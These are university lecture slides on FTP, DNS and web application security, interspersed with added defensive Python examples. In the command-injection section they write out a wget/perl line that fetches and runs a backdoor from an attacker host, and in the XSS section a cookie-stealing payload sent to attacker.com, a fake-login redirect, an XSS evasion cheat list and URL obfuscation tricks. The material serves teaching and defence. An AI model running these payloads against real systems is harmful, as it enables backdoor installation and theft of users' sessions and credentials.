Application Layer Security
Lecture 8
Supakorn Kungpisdan
NETE4630
1
Outline
FTP Security
DNS Security
Web Application Security
FTP Security Issues
All traffic is transmitted in clear text
Weak configuration on FTP allows brute force and dictionary attacks
Anonymous access may be enabled on the FTP server
If file permissions are not set, an anonymous user may be able to read, overwrite, or delete files, leading to loss of confidentiality, integrity, and availability of data
If anonymous access is being used on a server, make sure that the proper restrictions are enforced for this user
Types of FTP
Active FTP
Control connection is initiated by FTP client
Data connection is initiated by FTP server
Passive FTP
Control connection is initiated by FTP client
Data connection is initiated by FTP client
NETE4630 Advanced Network Security and Implementation
Active FTP
1. The client connects from a random unprivileged port (N > 1023) to the FTP server's command port, port 21. The client also sends the FTP command PORT N+1 from port N to port 21 at the FTP server. The client then starts listening on port N+1.
2. The server returns the response from port 21 to port N at the client.
3. The server then connects back to the client's specified data port from its local data port (port 20) to the client at port N+1.
Ref: http://slacksite.com/other/ftp.html
Active FTP (cont.)
[Figure: ftp session with debug enabled; letters in red show client input, letters in black show server output]
Client port = (14*256)+178 = 3762
Active FTP (cont.)
1. The client's command port contacts the server's command port (port 21) and sends the command PORT 1027 (N+1).
2. The server sends an ACK back from its port 21 to the client's command port (port 1026, port N).
3. The server initiates a connection on its local data port (port 20) to the data port the client specified earlier (port 1027).
4. The client sends an ACK back from port 1027 to the server's port 20.
Firewall VS Active FTP
From the server-side firewall's standpoint, to support active mode FTP the following communication channels need to be opened:
FTP server's port 21 from anywhere (Client initiates connection)
FTP server's port 21 to ports > 1023 (Server responds to client's control port)
FTP server's port 20 to ports > 1023 (Server initiates data connection to client's data port)
FTP server's port 20 from ports > 1023 (Client sends ACKs to server's data port)
Problems of Active FTP
The FTP client doesn't make the actual connection to the data port of the server.
The FTP client simply tells the server what port it is listening on (N+1) and waits for the server to connect back to the specified port on the client.
From the client-side stateful firewall's point of view, this appears to be an outside system initiating a connection to an internal client.
This connection may be blocked.
Because the server initiates the data connection, the server may connect to a different client.
Passive FTP
To solve the problem of active FTP, use passive FTP.
When opening an FTP connection, the client opens two random unprivileged ports locally (N > 1023 and N+1).
Port N contacts the server on port 21, but instead of then issuing a PORT command and allowing the server to connect back to its data port, the client issues the PASV command.
The server then opens a random unprivileged port (P > 1023) and sends the PORT P command back to the client.
The client then initiates the connection from port N+1 to port P on the server to transfer data.
Passive FTP (cont.)
[Figure: ftp session in passive mode; the server specifies the port number]
Client port = (195*256)+149 = 50069
Passive FTP
1. The client contacts the server on the command port (port N=1026) and issues the PASV command.
2. The server then replies with PORT 2024, telling the client which port it is listening on for the data connection.
3. The client then initiates the data connection from its data port (N+1=1027) to the specified server data port (port 2024).
4. The server sends back an ACK (from its port 2024) to the client's data port (port 1027).
Because the client initiates the data connection to the FTP server, the client-side firewall will not block it.
Firewall VS Passive FTP
From the server-side firewall's standpoint, to support passive FTP, the following communication channels need to be opened:
FTP server's port 21 from anywhere (Client initiates connection)
FTP server's port 21 to ports > 1023 (Server responds to client's control port)
FTP server's ports > 1023 from anywhere (Client initiates data connection to random port specified by server)
FTP server's ports > 1023 to remote ports > 1023 (Server sends ACKs (and data) to client's data port)
Problems of Passive FTP
The FTP server needs to allow remote connections to high-numbered ports on the server.
Fortunately, many FTP daemons, including the popular WU-FTPD, allow the administrator to specify the range of ports the FTP server will use.
Some FTP clients do not support passive mode.
FTP Bounce Scan
The FTP bounce attack uses a third workstation to act as a proxy between the nmap host and the destination station.
With passive FTP, a user could send a PORT command to an FTP server that would direct the data towards a completely different host!
The FTP bounce attack takes advantage of these poorly configured FTP servers (no control over the ranges of FTP ports).
The data is BOUNCED from the FTP server to the target host.
FTP Bounce Scan (cont.)
[Figure: FTP bounce scan responses for a closed port and for an open port]
Advantages of FTP Bounce Scan
The FTP bounce attack can scan "through" a firewall.
The FTP bounce attack uses standard FTP functionality.
Nmap does not require specialized packet configurations or changes to the FTP protocol.
Therefore, the FTP bounce attack does not require any privileged access.
Disadvantages of FTP Bounce Scan
The FTP bounce attack relies on the availability of an FTP server that allows a PORT command to redirect the data connection to a third device.
Most FTP servers have their default configuration set to protect against this use of the PORT command.
Other FTP Bounce Attack
When using active FTP, a client uses the PORT command to specify the IP address and port number that the server should connect to for the data connection.
An attacker with access to an FTP server can bounce through the server by specifying someone else's IP address.
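As an added example (not from the lecture or from the slacksite reference), here is the FTP port arithmetic used above and the server-side check that stops a bounce: PORT and the passive-mode reply carry the port as two decimal bytes, p1*256 + p2, and a server that compares the PORT address with the control connection's peer refuses to open a data connection to a third host. Real servers answer PASV with a 227 reply of the form shown rather than a PORT command; the IP addresses in the code are constructed.

```python
# Added example: FTP PORT / PASV parsing and an anti-bounce check (not lecture code).
# Ports travel as two bytes, port = p1*256 + p2, exactly as in (14*256)+178 = 3762
# and (195*256)+149 = 50069 in the lecture's debug output.
import re

PORT_RE = re.compile(r"^PORT\s+(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\s*$", re.I)
PASV_RE = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")


def parse_port_command(line):
    """Return (ip, port) from a client 'PORT h1,h2,h3,h4,p1,p2' command (active mode)."""
    m = PORT_RE.match(line.strip())
    if not m:
        raise ValueError("malformed PORT command")
    octets = [int(x) for x in m.groups()]
    if any(o > 255 for o in octets):
        raise ValueError("byte out of range in PORT command")
    h1, h2, h3, h4, p1, p2 = octets
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def parse_pasv_reply(line):
    """Return (ip, port) from a server '227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' reply."""
    m = PASV_RE.search(line)
    if not m:
        raise ValueError("malformed PASV reply")
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def accept_port_command(line, control_peer_ip):
    """Server-side bounce defence: accept a PORT command only when the data target is
    the host that owns the control connection and the port is unprivileged (> 1023).
    Returns (ok, reason)."""
    ip, port = parse_port_command(line)
    if ip != control_peer_ip:
        return False, f"PORT names {ip} but the control connection is from {control_peer_ip}"
    if port <= 1023:
        return False, f"PORT names privileged port {port}"
    return True, f"data connection to {ip}:{port}"
```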
Outline
FTP Security
DNS Security
Web Application Security
Domain Name System
DNS is a distributed database that holds the information for mapping between host names and IP addresses.
DNS uses both UDP and TCP.
UDP is typically used for queries, unless the lookup or response is greater than 512 bytes.
TCP is used for such lookups and for zone transfers.
Integrity and availability of DNS are critical for the health of the Internet. It is used in conjunction with almost every other protocol on the Internet.
Availability was considered while designing DNS; however, security was not.
DNS Request
DNS Response
DNS Lookup Process
[Figure: Host A and Host A's authoritative name server, steps 1 and 2]
1. Host A sends a request to the resolver (at Host A). It checks the local cache and may check the hosts file.
2. The resolver at Host A forwards the request to its authoritative name server.
DNS Non-recursive Query
[Figure: Host A, Host A's authoritative name server, Host B's authoritative name server and Host B, steps 1 to 5]
3. Find the address of the authoritative name server of the requested domain and return its address to the resolver.
DNS Recursive Query
[Figure: Host A, Host A's authoritative name server, Host B's authoritative name server and Host B, steps 1 to 5]
3. The server finds the address of the authoritative name server of the requested domain, passes the request on to that server, and returns a response to the resolver.
DNS Recursive Query (cont.)
DNS Hierarchy (Recursive Query)
[Figure: DNS hierarchy with the .com TLD server, steps 1 to 8; (1) is a recursive query, (2) is a non-recursive query]
What happens if (2) is a recursive query?
DNS Utilities
Most OSes come with a tool called nslookup, capable of querying DNS servers for various types of information.
The dig tool, which ships with UNIX systems, has similar capabilities.
Name-to-IP Lookup
MX Lookup with nslookup
DNS Security Issues
DNS lacks authentication and integrity checking.
Due to the lack of authentication, attackers can spoof DNS messages to perform a variety of attacks.
Due to the lack of integrity checking, attackers can intercept and modify messages in transit.
DNS Zone Transfer
For redundancy, administrators deploy both primary and secondary name servers that contain the same DBs.
To keep the DBs synchronized with the primary name server, the secondary name server periodically connects to the primary name server on port 53/TCP and grabs the DNS records.
This process is called a Zone Transfer.
DNS Information Gathering
DNS can provide a great deal of information about the target network and its hosts.
One of the common insecure configurations with DNS is allowing anyone to perform zone transfers on one of a domain's DNS servers.
If an attacker can perform a zone transfer with the primary or secondary name servers for a domain, he/she will be able to view all DNS records for that domain.
See a demo at http://www.mindterra.com/blog/?p=179
Solved by specifying the IP addresses that are allowed to perform the zone transfer, or by using Transaction Signatures (TSIG).
DNS Cache Poisoning
Both DNS clients and servers cache responses for a period of time in order to increase performance and reduce network traffic.
If an attacker can spoof a response for a DNS request, he/she may be able to contaminate the DNS cache with an incorrect record.
This process is known as DNS cache poisoning.
The only real defense built into DNS is the use of a random Transaction ID and source port.
Some versions of BIND use Transaction IDs that are not sufficiently random, and some use sequential Transaction IDs.
BIND 9 Cache Poisoning
DNS Cache Poisoning Example
http://www.ipa.go.jp/security/english/vuln/200809_DNS_en.html
How to Check for the Vulnerability
To see if one's own DNS server has a DNS cache poisoning vulnerability, the operator should ask three questions. If any of them is positive, the DNS cache server is left unpatched or has a problem in its configuration.
A. The port number used by DNS queries is not randomized
B. The ID number used for DNS queries is not randomized
C. The DNS server is allowed to reply to recursive DNS queries originated from the outside
http://www.ipa.go.jp/security/english/vuln/200809_DNS_en.html
Checking Port Randomness
If randomization of the port number used by DNS queries is insufficient, the risk of the server getting poisoned becomes higher.
Try a web-based DNS randomness test tool:
https://www.dns-oarc.net/oarc/services/dnsentropy
http://www.ipa.go.jp/security/english/vuln/200809_DNS_en.html
Web-based DNS Randomness Test
Web-based DNS Randomness Test (cont.)
Check Transaction ID Randomness
If randomization of the ID number for DNS queries is insufficient, the risk of the server getting poisoned becomes higher.
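As an added example (not from the lecture or from IPA), a screening check for the first two questions above, port randomness and ID randomness: it parses the transaction ID out of captured outgoing queries and flags a fixed source port or IDs that increase by one per query. The captures are constructed; a real assessment needs far more samples, which is what the DNS-OARC test provides.

```python
# Added example: screen captured outgoing DNS queries for a fixed source port and
# sequential transaction IDs (not lecture code). Captures below are constructed.
import secrets
import struct


def dns_header(txid, rd=True):
    """Build a 12-byte DNS query header: ID, flags (RD = 0x0100), QDCOUNT=1, others 0."""
    flags = 0x0100 if rd else 0x0000
    return struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)


def parse_header(raw):
    """Return (txid, recursion_desired) from the first 4 bytes of a DNS message."""
    txid, flags = struct.unpack("!HH", raw[:4])
    return txid, bool(flags & 0x0100)


def randomized_query():
    """What a patched resolver does: fresh random ID and a random unprivileged source port."""
    txid = secrets.randbelow(65536)
    port = 1024 + secrets.randbelow(65536 - 1024)
    return port, dns_header(txid)


def assess(captures):
    """captures: list of (source_port, raw_query) pairs seen leaving the resolver.
    Returns a dict of findings; an empty dict means neither weakness was detected."""
    ports = [port for port, _ in captures]
    ids = [parse_header(raw)[0] for _, raw in captures]
    issues = {}
    if len(set(ports)) == 1:
        issues["port"] = f"all {len(ports)} queries left from fixed source port {ports[0]}"
    if len(set(ids)) < len(ids):
        issues["id_reuse"] = "transaction IDs repeat within the sample"
    # Differences between consecutive IDs, modulo 16 bits: all equal to 1 means sequential.
    diffs = {(b - a) % 65536 for a, b in zip(ids, ids[1:])}
    if diffs == {1}:
        issues["id_sequential"] = "transaction IDs increase by exactly 1 per query"
    return issues


# Constructed capture of a resolver with both weaknesses: source port fixed at 53,
# transaction IDs 1000, 1001, ..., 1007.
WEAK = [(53, dns_header(txid)) for txid in range(1000, 1008)]
# Constructed capture of a resolver that randomizes both values.
GOOD = [randomized_query() for _ in range(8)]
```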
Checking Recursive Query Replies
Essentially, a DNS server (DNS content server) should not reply to recursive DNS queries originated from the outside.
Even if the server also acts as a DNS cache server, it should be limited to those originated within the domain.
The operator could use the "Cross-Pollination Scan" tool by IANA to check the DNS server for issue C (replying to recursive queries from the outside).
Specify the domain name(s) owned by the organization and send a test query.
http://recursive.iana.org/
http://www.ipa.go.jp/security/english/vuln/200809_DNS_en.html
Checking Recursive Query Replies
DNS Cache Snooping
The recursion desired (RD) bit tells the DNS server whether the query is recursive or non-recursive.
A remote DNS server may answer queries for 3rd-party domains that do not have the recursion bit set.
This may allow a remote attacker to determine which domains have recently been resolved via this name server, and therefore which hosts have been recently visited.
Ref: www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf
Possible Scenario
If an attacker was interested in whether your company utilizes the online services of a particular bank, they can use this attack to build a statistical model regarding company usage of the bank mentioned above.
This attack can also be used to find B2B partners, web-surfing patterns, external mail servers, and more...
Two techniques are available: using non-recursive queries and using recursive queries.
Some DNS servers allow both types of queries, but some allow only recursive queries to be made.
DNS Cache Snooping with Non-recursive Queries
The attacker queries ns1.tvcabo.pt for www.sidestep.pt
ns1.tvcabo.pt does not have the entry in its local cache. It returns no answer, but gives a list of .pt TLD name servers for further questions.
DNS Cache Snooping with Non-recursive Queries (cont.)
The fact that ns1.tvcabo.pt does not have the entry in its local cache means that none of the hosts under ns1.tvcabo.pt has communicated with www.sidestep.pt before.
Thus, this organization does not use services provided by www.sidestep.pt
DNS Cache Snooping with Non-recursive Queries (cont.)
If the attacker executes the same query again, check the response.
This time, ns1.tvcabo.pt has cached the entry, so it returns the answer.
DNS Cache Snooping with Recursive Queries
Used to determine with some degree of precision (not 100% sure) whether a given record is present in the cache.
However, this will pollute the cache.
If a given record is not present in the cache, it will be after the first query is made.
This is because a recursive query will always return the answer for the given record.
DNS Cache Snooping with Recursive Queries
Try to see if www.sidestep.pt was cached in ns1.tvcabo.pt
Query ns1.tvcabo.pt for www.sidestep.pt and record the TTL
DNS Cache Snooping with Recursive Queries (cont.)
Then query ns.sidestep.pt (Sidestep.com's authoritative DNS) for www.sidestep.com and compare the TTL
DNS Cache Snooping with Recursive Queries (cont.)
The TTL for www.sidestep.pt at ns1.tvcabo.pt (6458) is much lower than the initial TTL (86400) (the TTL at ns.sidestep.pt).
This is a good indicator that the answer was already cached at ns1.tvcabo.pt.
Another way to look for cached responses is to observe the time that the query takes to process.
If the query time is approximately equal to the round trip time (RTT) of a packet to the server, then the answer might already have been present in the cache.
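As an added example (not from the lecture or the referenced paper), the TTL test above in code, as an operator would run it against their own resolver to see whether it answers non-recursive queries from outside: a query with the recursion bit cleared, a parser that pulls the TTL out of the first answer, and the comparison against the authoritative TTL. The response bytes and the 90% threshold are constructed assumptions.

```python
# Added example: non-recursive DNS query, answer-TTL extraction and the lecture's
# cached-or-not heuristic (not lecture code). Response bytes below are constructed.
import struct


def encode_name(name):
    """'www.sidestep.pt' -> b'\\x03www\\x08sidestep\\x02pt\\x00' (DNS label format)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, txid, recursive):
    """DNS A query for name. recursive=False clears the RD bit (flags 0x0000)."""
    flags = 0x0100 if recursive else 0x0000
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def skip_name(msg, offset):
    """Return the offset just past a (possibly compressed) name starting at offset."""
    while True:
        length = msg[offset]
        if (length & 0xC0) == 0xC0:    # compression pointer: two bytes, then done
            return offset + 2
        if length == 0:
            return offset + 1
        offset += 1 + length


def first_answer_ttl(msg):
    """Return the TTL of the first answer RR, or None if the response has no answers."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    if an == 0:
        return None
    offset = 12
    for _ in range(qd):                # skip the question section (name + type + class)
        offset = skip_name(msg, offset) + 4
    offset = skip_name(msg, offset)    # answer owner name
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
    return ttl


def likely_cached(observed_ttl, authoritative_ttl):
    """Lecture's heuristic: an observed TTL well below the authoritative TTL (assumed
    here to mean below 90% of it) indicates the answer was already in the cache."""
    return observed_ttl is not None and observed_ttl < 0.9 * authoritative_ttl


# Constructed response to a non-recursive query: flags QR|RA, one A record with
# TTL 6458, owner name given as a compression pointer (0xC00C) to the question name.
CACHED_RESPONSE = (
    struct.pack("!HHHHHH", 0x1234, 0x8080, 1, 1, 0, 0)
    + encode_name("www.sidestep.pt") + struct.pack("!HH", 1, 1)
    + b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 6458, 4) + bytes([192, 0, 2, 10])
)
```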
A Safer BIND Configuration
Outline
FTP Security
DNS Security
Web Application Security
Attacking Web Applications
The majority of vulnerabilities are caused by a lack of proper input validation by the application before processing user-supplied data.
This can allow attackers to disclose information about the site, steal information from backend DBs, or execute binary code on the web server.
SQL Injection
Many web applications rely on backend DBs for information storage and retrieval.
Sometimes a script will perform a DB query using input supplied from a web page, without verifying that the input does not contain any escape characters.
Consider the following:
$query = "SELECT * FROM users WHERE username = '{$_POST['user']}' AND password = '{$_POST['pass']}'";
The resulting query:
"SELECT * FROM users WHERE username = 'bob' AND password = '' OR 1=1";
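As an added example (not from the lecture), the same login query in Python against an in-memory SQLite table: first interpolated as in the PHP above, then parameterized, which is the fix. The users table and the password s3cret are constructed.

```python
# Added example: the lecture's login query, interpolated (vulnerable) and parameterized
# (fixed), against a constructed in-memory SQLite database. Not lecture code.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('bob', 's3cret')")   # constructed account


def login_vulnerable(user, pw):
    """Splices user input into the SQL text exactly like the PHP example.
    A quote character in the input becomes part of the statement."""
    query = f"SELECT * FROM users WHERE username = '{user}' AND password = '{pw}'"
    return conn.execute(query).fetchall()


def login_safe(user, pw):
    """Same query with placeholders: the driver sends the values separately from the
    statement, so quotes in the input are data, never SQL syntax."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (user, pw)).fetchall()
```

With the password ' OR 1=1 -- the interpolated statement matches bob's row without the real password; the parameterized one matches nothing.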
Code Injection
Sometimes user-supplied strings are not properly checked for escape characters before being passed to commands as arguments.
Consider a PHP script that takes a string supplied from a web page form and passes it to the nslookup utility.
Code Injection (cont.)
If the user supplies ;ls / -la, the script will execute the command nslookup ;ls / -la, resulting in a listing of the root directory being printed out.
Code Injection (cont.)
The wget and perl commands could be used to download and run a backdoor on the web server by supplying the following line to the script:
;wget http://attackersite/backdoor.pl;perl backdoor.pl
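As an added example (not from the lecture), the nslookup wrapper in Python: the string the vulnerable script would hand to the shell (returned, never executed here) beside a hardened version that validates the input as a hostname and passes it as its own argv element with no shell involved. The hostname regex is an assumption about what the form should accept.

```python
# Added example: shell-interpolated nslookup wrapper vs. a validated, shell-free one.
# Not lecture code; HOSTNAME_RE is an assumed allow-list for the form field.
import re
import subprocess

# RFC 1123 style hostname: labels of letters, digits and hyphens, no leading/trailing hyphen.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def shell_command_vulnerable(user_input):
    """The string the lecture's script hands to the shell: input spliced in verbatim,
    so a ';' ends the nslookup command and starts a second one. Returned, not run."""
    return "nslookup " + user_input


def is_hostname(user_input):
    """True only for a syntactically valid hostname; ';ls / -la' and the like fail here."""
    return HOSTNAME_RE.match(user_input) is not None


def nslookup_argv(user_input):
    """Argument vector for the hardened call: the validated name is its own argv element,
    so shell metacharacters would be passed to nslookup as data, and are rejected anyway."""
    if not is_hostname(user_input):
        raise ValueError(f"rejected lookup target: {user_input!r}")
    return ["nslookup", user_input]


def run_nslookup(user_input):
    """Hardened wrapper: no shell (shell=False is the default), bounded runtime."""
    return subprocess.run(nslookup_argv(user_input), capture_output=True, text=True, timeout=10)
```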
Cross-Site Scripting (XSS)
XSS vulnerabilities allow attackers to inject code or HTML into a web page that will be executed when a different user visits that page.
These attacks target visitors to a web site, not the site itself, and occur when a web page does not properly sanitize user input before using it in output.
In fact, on vulnerable websites it is possible to execute HTML and JavaScript code from an unsanitized form, which combined can be really dangerous: it is possible to steal cookies or to redirect web pages to a fake login in order to steal usernames and passwords.
Types of XSS
The term XSS is actually a bit elusive because it includes different kinds of attacks that rely on different attacking mechanisms.
There are actually three types of Cross-Site Scripting, commonly named as:
DOM-Based XSS
Non-persistent XSS
Persistent XSS
Ref: http://www.milw0rm.com/papers/146
http://en.wikipedia.org/wiki/Cross_Site_Scripting
DOM-based XSS
DOM-based or Type 0 XSS vulnerability, also referred to as local XSS, is based on the standard object model for representing HTML or XML, called the Document Object Model or DOM for short.
DOM-based XSS allows an attacker to work not on a victim website but on the victim's local machine.
DOM-based XSS (cont.)
[Figure: (1) Attacker creates a website containing malicious code; (2) User downloads the malicious page by clicking on a link in an email, etc.; (3) Hacker executes commands on the downloaded page with the user's privileges on the machine]
DOM-based XSS (cont.)
1. The attacker creates a well-built malicious website. The ingenuous user opens that site.
2. The user has a vulnerable page on his machine.
3. The attacker's website sends commands to the vulnerable HTML page.
4. The vulnerable local page executes those commands with the user's privileges on that machine.
5. The attacker easily gains control of the victim's computer.
DOM-based XSS Solutions
DOM-based XSS is really dangerous because it operates strictly on the victim's system, and as long as the user doesn't look after his/her security and doesn't apply updates, the DOM-based XSS will keep working.
To prevent this kind of attack there are only two things to take care of:
Do not visit untrusted websites
Keep your system up to date
Non-persistent XSS
The non-persistent or Type 1 XSS is also referred to as a reflected vulnerability, and is by far the most common type.
It shows up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user.
If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page.
The attacker could provide some malicious code and try to make the server execute it in order to obtain some result.
Non-persistent XSS: Search Engine
The attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will render those HTML entities.
If this happens, in 99% of cases the search engine will also execute arbitrary JavaScript code.
Non-persistent XSS Example: Search Engine
1. Assure that a website works like this:
http://www.example.com/search.php?text=TEXTTOSEARCH
2. Try to include some HTML tags in the "text" variable:
http://www.example.com/search.php?text=<img src="http://attacker.com/image.jpg">
If the website is vulnerable it will display the attacker's image in the result webpage.
Example (cont.)
3. Try then to write some JavaScript code:
http://www.example.com/search.php?text=<script>alert(document.cookie)</script>
Probably the website will return an alert popup with the current cookie for the site itself.
Example (cont.)
This vulnerability can be used by the attacker to steal information from users of the victim website, providing them for example with an email containing a URL like:
http://www.victim.com/search.php?text=MALICIOUSCODE
To make that URL less suspicious it is useful to encode the code in URL hex values.
For example the code <script>alert("XSS")</script> encoded will look like:
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E
Example (cont.)
And so the malicious URL will turn from:
http://www.victim.com/search.php?text=<script>alert("XSS")</script>
into:
http://www.victim.com/search.php?text=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E
which, for a clueless user, is a lot less suspicious than the first one.
Example (cont.)
[Figure: the encoded URL http://www.victim.com/search.php?text=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E leads to a fake login; the fake login steals the username and password of the victim]
Example (cont.)
1. The attacker realizes that the victim website is vulnerable to XSS.
2. The attacker creates on his website an ad-hoc page which is used to steal sensitive information, e.g. cookies, or to present a fake login of the victim website.
3. The attacker provides to a user a crafted URL containing malicious code like:
http://www.victim.com/search.php?text=<script>document.location("http://attackersite.com/fakelogin.php")</script>
encoded in hex.
4. The user visits the web page and is silently redirected to the attacker's fake login.
5. The user is invited to log into the system and he does.
6. The fake login steals the username and password of the victim.
Persistent XSS
Persistent XSS is similar to non-persistent XSS.
Both work on a victim site and try to steal user information.
However, the attacker doesn't need to provide the crafted URL to the users,
because the website itself permits users to insert fixed data into the system.
This is the case, for example, of "guestbooks".
Usually users use that kind of tool to leave messages to the owner of the website.
An attacker can insert some malicious code in his message and make ALL visitors victims of it.
Persistent XSS (cont.)
Attacker posts the following code:
<img src="javascript:document.location('http://attacker.com/steal.php?cookie=' . encodeURI(document.cookie));">
Attacker can steal the user's cookies or steal the session
Exploit Scenario
1. Bob hosts a web site allowing users to post messages and other content to the site for later viewing by other members.
2. Mallory notices that Bob's website is vulnerable to a type 2 XSS attack.
3. Mallory posts a message, controversial in nature, which may encourage many other users of the site to view it.
4. Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to Mallory's web server without their knowledge.
5. Later, Mallory logs in as other site users and posts messages on their behalf....
Exploit Scenario (cont.)
This works when the tool provided (the guestbook in the example) doesn't do any check on the content of the inserted message: it just inserts the data provided by the user into the result page.
The attacker could easily insert as much code as he wants into the tool, for example:
<img src="javascript:document.location('http://attacker.com/steal.php?cookie=' . encodeURI(document.cookie));">
This allows the attacker to steal the cookie of the victim user.
More about XSS
In order to make the attack less suspicious it's possible to "obfuscate" the IP address of the attacker's website, encoding the IP address in three formats:
Dword Address
Hex Address
Octal Address
For example the IP address 127.0.0.1 will look like:
Dword: 2130706433
Hex: 0x7f.0x00.0x00.0x01
Octal: 0177.0000.0000.0001
Try for example: http://0x7f.0x00.0x00.0x01/ and it will open your localhost web server.
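As an added example (not from the lecture), the defender's side of the two obfuscations discussed above, the hex-encoded search URL and the dword/hex/octal host forms: percent-decode a URL until it stops changing, rewrite a numeric host back to dotted-quad, and HTML-escape reflected text, which is the output encoding whose absence makes search.php vulnerable. The script signature is a coarse screening regex, an assumption, not an HTML parser.

```python
# Added example: normalize an obfuscated URL before inspection, and escape reflected
# output. Not lecture code; SCRIPT_RE is an assumed screening signature.
import html
import re
from urllib.parse import unquote, urlsplit

SCRIPT_RE = re.compile(r"<\s*script\b|javascript\s*:|\bon[a-z]+\s*=", re.I)


def fully_decode(text, max_rounds=5):
    """Percent-decode until the string stops changing, so double encoding is undone too."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            return text
        text = decoded
    return text


def looks_like_xss(url):
    """True if the decoded query string carries script-bearing markup."""
    query = urlsplit(url).query
    return SCRIPT_RE.search(fully_decode(query)) is not None


def _parse_part(part):
    """One numeric host component as a C-style literal: 0x.. hex, leading 0 octal, else decimal."""
    if part.lower().startswith("0x"):
        return int(part[2:], 16)
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)
    return int(part)


def normalize_host(host):
    """Dword (2130706433), hex (0x7f.0x00.0x00.0x01), octal (0177.0000.0000.0001) and
    dotted-decimal hosts all come back as '127.0.0.1'; DNS names are returned unchanged."""
    parts = host.split(".")
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return host          # contains non-numeric labels: an ordinary DNS name
    if len(values) == 1:     # dword form: a single 32-bit number
        n = values[0]
        values = [(n >> 24) & 255, (n >> 16) & 255, (n >> 8) & 255, n & 255]
    if len(values) != 4 or any(v > 255 for v in values):
        raise ValueError(f"not an IPv4 host: {host}")
    return ".".join(str(v) for v in values)


def to_dword(dotted):
    """Inverse of the dword form: '127.0.0.1' -> 2130706433."""
    a, b, c, d = (int(x) for x in dotted.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d


def safe_reflect(user_text):
    """Output encoding: what search.php should apply before echoing the search text."""
    return html.escape(user_text, quote=True)


# Constructed sample: the lecture's hex-encoded URL.
ENCODED_URL = ("http://www.victim.com/search.php?text=%3C%73%63%72%69%70%74%3E%61%6C%65%72"
               "%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E")
```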
Possible XSS Cheats
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG
SRC="javascri
0;t
:alert('PL&#
x41;YH
ACK.NET')">
<IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">
<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<iframe src=http://example.com/scriptlet.html <
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert(document.cookie)>
<IMG DYNSRC="javascript:alert('XSS')">
Possible XSS Cheats (cont.)
<IMG DYNSRC="javascript:alert('XSS')"> <BR SIZE="&{alert('XSS')}">
<IMG SRC='vbscript:msgbox("XSS")'>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="width: expression(alert('XSS'));">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<A HREF="javascript:document.location='http://www.example.com/'">XSS</A>
Information Disclosure
An error page can disclose the path of the web server's root directory.
The path disclosure can aid attackers performing reconnaissance on the site.
phpinfo.php, part of a default PHP install, is a script providing the OS and software versions on the host and other related information.
Google for inurl:phpinfo.php to see exactly how much information is leaked.
Questions?
Next week: People Layer Security
Questions
1. Find out how to configure a firewall to allow:
   1. Active FTP
   2. Passive FTP
2. Suggest a technique to ensure authentication and integrity for DNS